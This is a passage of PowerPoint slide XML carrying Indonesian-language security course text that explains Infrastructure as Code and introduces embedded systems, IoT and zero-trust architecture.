              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bentuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> manual.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>📌 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Penjelasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>IaC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, server, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>didefinisikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>: Terraform, Ansible, CloudFormation).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Membawa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keuntungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konsistensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otomatisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>skalabilitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan version control.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daripada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> setup server manual, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cukup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jalankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> file Terraform </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> 10 VM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sama</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141</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="341350981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n-NO" b="1" dirty="0"/>
              <a:t>Sistem Tertanam dan Arsitektur Zero Trust</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>profesional</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memahami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konsep-konsep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berkaitan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertanam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, Internet of Things (IoT), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>industri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> zero trust. Seiring </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adopsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertanam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> IoT yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seluruh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>industri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keduanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghadirkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tantangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>unik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Memahami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknologi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>langkah-langkah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tepat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketahanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjaga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>integritas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Para </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>profesional</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menguasai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konsep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> zero trust yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menekankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>prinsip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pernah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>percaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>selalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>verifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>". </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pengetahuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tentang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konsep-konsep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberdayakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> para </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>profesional</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengurangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di dunia yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semakin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kompleks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saling</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhubung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Tertanam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertanam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>khusus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>elektronik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konsumen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otomasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>industri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otomotif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>medis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>banyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>contohnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berikut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Peralatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>rumah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>tangga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>-Seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lemari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> es, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mesin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
